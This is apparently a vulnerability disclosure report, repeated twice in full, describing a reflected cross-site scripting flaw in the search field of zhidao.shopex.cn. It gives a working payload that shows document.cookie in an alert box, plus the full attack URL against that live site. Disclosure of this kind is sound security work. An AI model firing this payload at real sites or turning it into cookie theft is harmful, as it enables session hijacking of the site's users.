### 简要描述: There is a XSS found on zhidao.shopex.cn ### 详细说明: Severity: XSS Confidence: Confident Host: http://zhidao.shopex.cn/ Path: / Issue detail: If you enter the following XSS vector for the search field: `"><video><source onerror=alert(document.cookie)> http://zhidao.shopex.cn/search?lm=2&word="><video><source onerror=alert(document.cookie)>` ### 漏洞证明: Using the above link, you will see a XSS like the image below. [<img src="https://images.seebug.org/upload/201208/272156438f0025cf3d2fbfa53a41e7ca8f8ba7f1.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/272156438f0025cf3d2fbfa53a41e7ca8f8ba7f1.png)
### 简要描述: There is a XSS found on zhidao.shopex.cn ### 详细说明: Severity: XSS Confidence: Confident Host: http://zhidao.shopex.cn/ Path: / Issue detail: If you enter the following XSS vector for the search field: `"><video><source onerror=alert(document.cookie)> http://zhidao.shopex.cn/search?lm=2&word="><video><source onerror=alert(document.cookie)>` ### 漏洞证明: Using the above link, you will see a XSS like the image below. [<img src="https://images.seebug.org/upload/201208/272156438f0025cf3d2fbfa53a41e7ca8f8ba7f1.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201208/272156438f0025cf3d2fbfa53a41e7ca8f8ba7f1.png)